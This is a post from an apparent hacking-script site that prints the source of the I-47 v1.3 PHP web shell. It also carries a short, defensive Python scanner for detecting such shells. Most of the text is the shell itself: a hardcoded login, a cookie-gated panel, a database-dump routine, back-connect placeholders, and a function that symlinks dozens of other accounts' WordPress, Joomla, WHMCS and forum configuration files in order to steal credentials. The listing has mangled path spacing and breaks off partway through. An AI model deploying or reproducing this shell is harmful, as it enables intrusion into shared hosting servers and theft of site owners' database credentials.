HackingScripts

Hack Scripts for everybody

I-47 shell

19 Feb 2014

This I-47 shell is a script coded by Arjun, who also wrote the dhanush shell.

Arjun says: “I-47 Shell is a PHP script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerabilities present in the web server. This shell provides you almost every facility that the security analyst needs for penetration testing. This is an “All In One” PHP script, so that the user does not need to go anywhere else.
This script is coded by an Indian Ethical Hacker.
This script is only coded for education purposes or testing on your own server. The developer of the script is not responsible for any damage or misuse of it”.
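
For defenders, an added example (not part of the original post or of the I-47 code): a static scanner that scores PHP files for traits visible in the listing below, namely the `hacked` cookie compared with `md5($pass)`, database credentials read from `dbserver`/`dbuser`/`dbpass` cookies, bulk `symlink()` calls into `/home*/` config files, and the `dumpDB` action. The rule weights, the alert threshold and both sample inputs are assumptions constructed for this example.

```python
import re
from pathlib import Path

# (rule name, regex, weight, minimum match count for the rule to fire).
# Patterns mirror constructs visible in the I-47 listing; weights and
# minimum counts are assumptions chosen for this example.
RULES = [
    # Login gate: a cookie value compared directly with md5(...).
    ("cookie_md5_gate", r"\$_COOKIE\s*\[[^\]]+\]\s*==\s*md5\s*\(", 3, 1),
    # Database credentials carried in client-supplied cookies.
    ("db_creds_in_cookies",
     r"\$_COOKIE\s*\[\s*['\"]db(?:server|user|pass)['\"]\s*\]", 3, 2),
    # Many symlinks pointing into other accounts' home directories.
    ("mass_config_symlinks", r"symlink\s*\(\s*['\"]\s*/\s*home\d*\s*/", 3, 5),
    # Request-driven database dump switch.
    ("dump_action_param",
     r"\$_GET\s*\[\s*['\"]action['\"]\s*\]\s*==\s*['\"]dumpDB['\"]", 2, 1),
    # Long base64-looking string literal (embedded encoded payload).
    ("long_base64_literal", r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]", 2, 1),
    # Weak context signals: common in shells, but also in ordinary code.
    ("errors_silenced", r"error_reporting\s*\(\s*0\s*\)", 1, 1),
    ("no_time_limit", r"set_time_limit\s*\(\s*0\s*\)", 1, 1),
]
COMPILED = [(n, re.compile(p, re.I), w, m) for n, p, w, m in RULES]
ALERT_SCORE = 5  # assumption: needs more than one strong trait


def scan_source(text):
    """Score one PHP source string; return fired rules with match counts."""
    hits = {}
    score = 0
    for name, rx, weight, minimum in COMPILED:
        count = len(rx.findall(text))
        if count >= minimum:
            hits[name] = count
            score += weight
    return {"score": score, "hits": hits, "alert": score >= ALERT_SCORE}


def scan_tree(root):
    """Scan every *.php file under root; return (path, report) for alerts."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        report = scan_source(text)
        if report["alert"]:
            findings.append((str(path), report))
    return findings


# Constructed, inert sample that imitates the traits of the listing.
_SYMLINKS = "\n".join(
    "symlink('/home%s/'.$usern.'/public_html/wp-config.php', "
    "$pdomain.'~~W%s.txt');" % (n, n)
    for n in ("", "2", "3", "4", "5")
)
SHELL_LIKE_SAMPLE = """<?php
error_reporting(0);
@set_time_limit(0);
if ($_GET["action"] == "dumpDB") {
    $dbserver = $_COOKIE["dbserver"];
    $dbuser = $_COOKIE["dbuser"];
    $dbpass = $_COOKIE["dbpass"];
}
if (isset($_COOKIE['hacked']) && $_COOKIE['hacked'] == md5($pass)) {
""" + _SYMLINKS + "\n}\n"

# Constructed benign sample: one weak signal only, so it must not alert.
BENIGN_SAMPLE = """<?php
error_reporting(0);
$theme = $_COOKIE['theme'];
symlink('/var/www/shared/uploads', 'uploads');
echo md5($theme);
"""

if __name__ == "__main__":
    for label, sample in (("shell-like", SHELL_LIKE_SAMPLE),
                          ("benign", BENIGN_SAMPLE)):
        print(label, scan_source(sample))
```

Point `scan_tree()` at a web root to sweep it; a hit is a lead for manual review, since each rule on its own can also match legitimate code.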

I-47 v1.3 shell Source Code

   1 <?php
   2 //========================================//
   3 //========+++I-47 v1.3+++==========//
   4 //========================================//
   5 //====+++Coded By Arjun+++===//
   6 //========================================//
   7 //=====+++An Indian Hacker+++=====//
   8 //========================================//
   9 
  10 // Set Username & Password
  11 $user = "I-47";
  12 $pass = "I-47";
  13 <?php
  14 @set_magic_quotes_runtime(0);
  15 ob_start();
  16 error_reporting(0);
  17 @set_time_limit(0);
  18 @ini_set('max_execution_time', 0);
  19 @ini_set('output_buffering', 0);
  20 // Dump Database
  21 if ($_GET["action"] == "dumpDB") {
  22     $self = $_SERVER["PHP_SELF"];
  23     if (isset($_COOKIE['dbserver'])) {
  24         $date = date("Y-m-d");
  25         $dbserver = $_COOKIE["dbserver"];
  26         $dbuser = $_COOKIE["dbuser"];
  27         $dbpass = $_COOKIE["dbpass"];
  28         $dbname = $_GET['dbname'];
  29         $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
  30         $file = "Dump-$dbname-$date";
  31         $file = "Dump-$dbname-$date.sql";
  32         $fp = fopen($file, "w");
  33         function write($data) {
  34             global $fp;
  35             fwrite($fp, $data);
  36         }
  37         mysql_connect($dbserver, $dbuser, $dbpass);
  38         mysql_select_db($dbname);
  39         $tables = mysql_query("SHOW TABLES");
  40         while ($i = mysql_fetch_array($tables)) {
  41             $i = $i['Tables_in_' . $dbname];
  42             $create = mysql_fetch_array(mysql_query("SHOW CREATE TABLE " . $i));
  43             write($create['Create Table'] . ";");
  44             $sql = mysql_query("SELECT * FROM " . $i);
  45             if (mysql_num_rows($sql)) {
  46                 while ($row = mysql_fetch_row($sql)) {
  47                     foreach ($row as $j => $k) {
  48                         $row[$j] = "'" . mysql_escape_string($k) . "'";
  49                     }
  50                     write("INSERT INTO $i VALUES(" . implode(",", $row) . ");");
  51                 }
  52             }
  53         }
  54         fclose($fp);
  55         header("Content-Disposition: attachment; filename=" . $file);
  56         header("Content-Type: application/download");
  57         header("Content-Length: " . filesize($file));
  58         flush();
  59         $fp = fopen($file, "r");
  60         while (!feof($fp)) {
  61             echo fread($fp, 65536);
  62             flush();
  63         }
  64         fclose($fp);
  65     }
  66 }
  67 $back_connect_c = "";
  68 $backconnect_perl = "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";
  69 $zone = "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";
  70 $bind_port_c = "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";
  71 $bind_port_p = "";
  72 $phpproxy = "
  73 ";
  74 ?>
  75 <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> 
  76 <title>I-47 : By Arjun</title>
  77 <script type="text/javascript">
  78 checked = false;
  79 function checkedAll () 
  80 {
  81     if (checked == false){checked = true}else{checked = false}
  82    for (var i = 0; i < document.getElementById('myform').elements.length; i++) 
  83    {
  84      document.getElementById('myform').elements[i].checked = checked;
  85    }
  86 }
  87 </script>
  88 <style type="text/css">
  89 <!--
  90 
  91 body,td,th {
  92    color: #FF0000;
  93 }
  94 input.but {
  95     background-color:#006633;
  96     color: white;
  97     border : 1px solid #ccc;
  98 }
  99 a:link {
 100    color: #00FF00;
 101    text-decoration:none;
 102    font-weight:600;
 103 }
 104 a:hover {
 105    color:#00FF00;
 106    text-decoration:underline;
 107 }
 108 font.txt
 109 {
 110    color: #00FF00;
 111    text-decoration:none;
 112    font-size:17px;
 113 }
 114 a:visited {
 115    color: #006600;
 116 }
 117 input.box
 118 {
 119     background-color:#0C0C0C;
 120     color: white;
 121     border : 1px solid #ccc;
 122    -moz-border-radius:6px;
 123    width:400;
 124    border-radius:6px;
 125 }
 126 input.sbox
 127 {
 128     background-color:#0C0C0C;
 129     color: white;
 130     border : 1px solid #ccc;
 131    -moz-border-radius:6px;
 132    width:180;
 133    border-radius:6px;
 134 }
 135 select.sbox
 136 {
 137     background-color:#0C0C0C;
 138     color: white;
 139     border : 1px solid #ccc;
 140    -moz-border-radius:6px;
 141    width:180;
 142    border-radius:6px;
 143 }
 144 select.box
 145 {
 146     background-color:#0C0C0C;
 147     color: white;
 148     border : 1px solid #ccc;
 149    -moz-border-radius:6px;
 150    width:400;
 151    border-radius:6px;
 152 }
 153 
 154 textarea.box
 155 {
 156     border : 3px solid #111;
 157     background-color:#161616;
 158     color : white;
 159     margin-top: 10px;
 160    -moz-border-radius:7px;
 161    border-radius:7px;
 162 }
 163 body {
 164    background-color:#000000;
 165 }
 166 -->
 167 </style>
 168 <body>
 169 <?php
 170 if (isset($_COOKIE['hacked']) && $_COOKIE['hacked'] == md5($pass)) {
 171     $self = $_SERVER["PHP_SELF"];
 172     $os = "N/D";
 173     if (stristr(php_uname(), "Windows")) {
 174         $SEPARATOR = '\';
 175           $os = "Windows";
 176           $directorysperator="\";
 177           
 178   }
 179   else if(stristr(php_uname(),"Linux"))
 180   {
 181           $os = "Linux";
 182           $directorysperator=' / ';
 183           
 184   }
 185   function Trail($d,$directsperator)
 186   {
 187       $d=explode($directsperator,$d);
 188       array_pop($d);
 189       array_pop($d);
 190       $str=implode($d,$directsperator);
 191       return $str;
 192   }
 193   
 194   function syml($usern,$pdomain)
 195   {
 196       symlink(' / home / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 197       symlink(' / home / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 198       symlink(' / home / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 199       symlink(' / home / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 200       symlink(' / home / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 201       symlink(' / home / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 202       symlink(' / home / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 203       symlink(' / home / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 204       symlink(' / home / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 205       symlink(' / home / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 206       symlink(' / home / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 207       symlink(' / home / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 208       symlink(' / home / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 209       symlink(' / home / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 210       symlink(' / home / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 211       symlink(' / home / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 212       symlink(' / home / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 213       symlink(' / home / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 214       symlink(' / home / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 215       symlink(' / home / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 216       symlink(' / home / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 217       symlink(' / home / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 218       symlink(' / home / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 219       symlink(' / home / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 220       symlink(' / home / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 221       symlink(' / home / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 222       symlink(' / home / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 223       symlink(' / home / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 224       symlink(' / home / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 225       symlink(' / home / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 226       symlink(' / home2 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 227       symlink(' / home2 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 228       symlink(' / home2 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 229       symlink(' / home2 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 230       symlink(' / home2 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 231       symlink(' / home2 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 232       symlink(' / home2 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 233       symlink(' / home2 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 234       symlink(' / home2 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 235       symlink(' / home2 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 236       symlink(' / home2 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 237       symlink(' / home2 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 238       symlink(' / home2 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 239       symlink(' / home2 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 240       symlink(' / home2 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 241       symlink(' / home2 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 242       symlink(' / home2 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 243       symlink(' / home2 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 244       symlink(' / home2 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 245       symlink(' / home2 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 246       symlink(' / home2 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 247       symlink(' / home2 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 248       symlink(' / home2 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 249       symlink(' / home2 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 250       symlink(' / home2 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 251       symlink(' / home2 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 252       symlink(' / home2 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 253       symlink(' / home2 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 254       symlink(' / home2 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 255       symlink(' / home2 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 256       symlink(' / home3 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 257       symlink(' / home3 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 258       symlink(' / home3 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 259       symlink(' / home3 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 260       symlink(' / home3 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 261       symlink(' / home3 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 262       symlink(' / home3 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 263       symlink(' / home3 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 264       symlink(' / home3 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 265       symlink(' / home3 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 266       symlink(' / home3 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 267       symlink(' / home3 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 268       symlink(' / home3 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 269       symlink(' / home3 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 270       symlink(' / home3 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 271       symlink(' / home3 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 272       symlink(' / home3 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 273       symlink(' / home3 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 274       symlink(' / home3 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 275       symlink(' / home3 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 276       symlink(' / home3 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 277       symlink(' / home3 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 278       symlink(' / home3 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 279       symlink(' / home3 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 280       symlink(' / home3 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 281       symlink(' / home3 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 282       symlink(' / home3 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 283       symlink(' / home3 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 284       symlink(' / home3 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 285       symlink(' / home3 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 286       symlink(' / home4 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 287       symlink(' / home4 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 288       symlink(' / home4 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 289       symlink(' / home4 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 290       symlink(' / home4 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 291       symlink(' / home4 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 292       symlink(' / home4 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 293       symlink(' / home4 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 294       symlink(' / home4 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 295       symlink(' / home4 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 296       symlink(' / home4 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 297       symlink(' / home4 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 298       symlink(' / home4 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 299       symlink(' / home4 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 300       symlink(' / home4 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 301       symlink(' / home4 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 302       symlink(' / home4 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 303       symlink(' / home4 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 304       symlink(' / home4 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 305       symlink(' / home4 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 306       symlink(' / home4 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 307       symlink(' / home4 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 308       symlink(' / home4 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 309       symlink(' / home4 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 310       symlink(' / home4 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 311       symlink(' / home4 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 312       symlink(' / home4 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 313       symlink(' / home4 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 314       symlink(' / home4 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 315       symlink(' / home4 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 316       symlink(' / home5 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 317       symlink(' / home5 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 318       symlink(' / home5 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 319       symlink(' / home5 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 320       symlink(' / home5 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 321       symlink(' / home5 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 322       symlink(' / home5 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 323       symlink(' / home5 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 324       symlink(' / home5 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 325       symlink(' / home5 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 326       symlink(' / home5 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 327       symlink(' / home5 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 328       symlink(' / home5 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 329       symlink(' / home5 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 330       symlink(' / home5 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 331       symlink(' / home5 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 332       symlink(' / home5 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 333       symlink(' / home5 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 334       symlink(' / home5 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 335       symlink(' / home5 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 336       symlink(' / home5 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 337       symlink(' / home5 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 338       symlink(' / home5 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 339       symlink(' / home5 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 340       symlink(' / home5 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 341       symlink(' / home5 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 342       symlink(' / home5 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 343       symlink(' / home5 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 344       symlink(' / home5 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 345       symlink(' / home5 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 346       symlink(' / home6 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 347       symlink(' / home6 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 348       symlink(' / home6 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 349       symlink(' / home6 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 350       symlink(' / home6 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 351       symlink(' / home6 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 352       symlink(' / home6 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 353       symlink(' / home6 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 354       symlink(' / home6 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 355       symlink(' / home6 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 356       symlink(' / home6 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 357       symlink(' / home6 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 358       symlink(' / home6 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 359       symlink(' / home6 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 360       symlink(' / home6 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 361       symlink(' / home6 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 362       symlink(' / home6 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 363       symlink(' / home6 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 364       symlink(' / home6 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 365       symlink(' / home6 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 366       symlink(' / home6 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 367       symlink(' / home6 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 368       symlink(' / home6 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 369       symlink(' / home6 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 370       symlink(' / home6 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 371       symlink(' / home6 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 372       symlink(' / home6 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 373       symlink(' / home6 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 374       symlink(' / home6 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 375       symlink(' / home6 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 376       symlink(' / home7 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 377       symlink(' / home7 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 378       symlink(' / home7 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 379       symlink(' / home7 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 380       symlink(' / home7 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 381       symlink(' / home7 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 382       symlink(' / home7 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 383       symlink(' / home7 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 384       symlink(' / home7 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 385       symlink(' / home7 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 386       symlink(' / home7 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 387       symlink(' / home7 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 388       symlink(' / home7 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
